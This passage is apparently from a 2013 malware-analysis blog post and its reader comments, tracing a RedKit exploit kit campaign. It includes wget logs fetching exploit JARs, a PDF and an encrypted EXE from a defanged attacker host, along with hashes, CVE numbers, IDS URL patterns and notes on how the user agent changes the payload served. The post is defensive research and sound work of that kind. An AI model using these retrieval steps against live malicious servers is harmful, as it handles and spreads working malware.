That would have taken me ages to figure out, but now I'm happy. One caveat: the User-Agent you send matters too — as the update below shows, fetching with a "Java" user agent makes the kit hand back an encrypted payload rather than the plain EXE.
4. Fetch the exploit files - for real
--2013-03-10 20:02:13-- hxxp: //fgccnc.org/332.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 19:03:08 GMT
Server: Apache
Content-Disposition: inline; filename=e55de572.jar
Content-Length: 13798
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/java-archive
Length: 13798 (13K) [application/java-archive]
Saving to: `332.jar'
0K .......... ... 100% 2.65M=0.005s
2013-03-10 20:02:15 (2.65 MB/s) - `332.jar' saved [13798/13798]
--2013-03-10 20:03:30-- hxxp: //fgccnc.org/887.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 19:04:25 GMT
Server: Apache
Content-Disposition: inline; filename=31d64b95.jar
Content-Length: 13731
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/java-archive
Length: 13731 (13K) [application/java-archive]
Saving to: `887.jar'
0K .......... ... 100% 4.37M=0.003s
2013-03-10 20:03:32 (4.37 MB/s) - `887.jar' saved [13731/13731]
--2013-03-10 20:04:26-- hxxp: //fgccnc.org/987.pdf
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 19:05:20 GMT
Server: Apache
Content-Disposition: inline; filename=bb43a521.pdf
Content-Length: 5531
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/pdf
Length: 5531 (5.4K) [application/pdf]
Saving to: `987.pdf'
0K ..... 100% 113M=0s
2013-03-10 20:04:28 (113 MB/s) - `987.pdf' saved [5531/5531]
Excellent. The files are downloaded. Time for a quick analysis:
5. Quick analysis
Let's figure out what the bad guys wanted to send us, and what payload they really wanted to hand over to the poor Madonna fans.
332.jar
MD5: 913f1d801abd70a483888ea20aad3a73
VirusTotal: 5/45 https://www.virustotal.com/en/file/08759205ed8a2030e659e2ee843c56d13fadd18cdb1a5e1a077bd4e8422dd035/analysis/1362953517/
CVE-2012-1723
887.jar
MD5: 60de68f7919603650a50633f82da7c9b
VirusTotal: 6/45 https://www.virustotal.com/en/file/912991ab959148febe90297815dd3025507bad10ffebe7555dfddf7708dd6566/analysis/1362953559/
987.pdf
MD5: 67c5a657b54cf4dc9cae74bfb763a285
VirusTotal: 2/45 https://www.virustotal.com/en/file/7be4238988221318f2ca6c41419fd452d892d0af62efa9834d55411900ecfbc3/analysis/1362953625/
Wepawet: Malicious http://wepawet.iseclab.org/view.php?hash=67c5a657b54cf4dc9cae74bfb763a285&type=js
CVE-2010-0188
As wepawet is kind enough to give us the URL to the EXE:
6. Fetching the final payload
--2013-03-10 20:08:26-- hxxp: //fgccnc.org/62.html
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 19:09:21 GMT
Server: Apache
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe
Content-Length: 32128
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/octet-stream
Length: 32128 (31K) [application/octet-stream]
Saving to: `62.exe'
0K .......... .......... .......... . 100% 51.3K=0.6s
2013-03-10 20:08:29 (51.3 KB/s) - `62.exe' saved [32128/32128]
62.exe AKA setup.exe
MD5:5b7c57fb83f0e47821b97fb93f055716
Virustotal: 0/45
Hmmmf; 0/45 at VT and no MZ header at the start of the file. Need to look more into this... (the update below explains why: the file came back encrypted because of the user agent used for the fetch, so this hash is of the encrypted blob, not of the real executable).
7. IDS signatures
As a side step: writing IDS signatures for requests to 332.jar, 887.jar, 987.pdf and 62.html, for responses carrying `Content-Disposition: inline; filename=setup.exe`, and for the URL pattern `[a-z][a-z][a-z][a-z]\.html?\?.=[0-9][0-9][0-9][0-9][0-9][0-9]` should help you sleep better at night if you work in intrusion detection / prevention. Two caveats: the redirect above landed on `mhed.htm` (no trailing `l`), so the pattern must accept both `.htm` and `.html`; and the numeric file names will almost certainly rotate between campaigns, so the URL pattern and the `Content-Disposition: inline; filename=<8 hex chars>.jar|.pdf` header seen in the fetches above are the more durable indicators.
Still some fun left here, but no time today. Hopefully tomorrow...
Update 2013-03-13
Well, I just wanted to revisit my .exe file to figure out what was wrong. Since I had not analyzed it properly, I thought there was some XOR scheme or encryption/obfuscation I had overlooked.
So I started up my remnux box and got:
First densityscout, with a low value indicating that this is pretty much random bytes. So it is either some kind of encryption or a rotating XOR. xorsearch told me there was no single-byte XOR match either :(
Then I went back to my log for the fetch and noticed that I had used "Java" as the user agent, and I remembered that RedKit then serves encrypted .exe files.
Then everything went smoother and here is the quick analysis:
setup.exe
MD5: 06c907401d42dc218f3ca9b83b4d07ce
Virustotal: 28/45
Great post by n3mes1s covering analysis of the PDF as well.
PS: it seems only the "Accept:" header is needed for the PDF fetch.
Happy RedKit EK malware-file stealing!
Post publish reading:
Kahu Security - "Digging deeper into redkit"
Malwageddon - "RedKit: Lights! Camera! Action --- Part 2"
malforsec - "Redkit payload decryption"

After you remembered you had used "Java" as the user agent and that you would get encrypted .exe files from RedKit — what did you have to do to decrypt the .exe?
Since I used Java in the user agent I got an encrypted file. It is AES-encrypted, and the key and IV are embedded in the JAR file.
Since the info is published elsewhere I decided to publish as well: http://malforsec.blogspot.com/2013/05/redkit-payload-decryption.html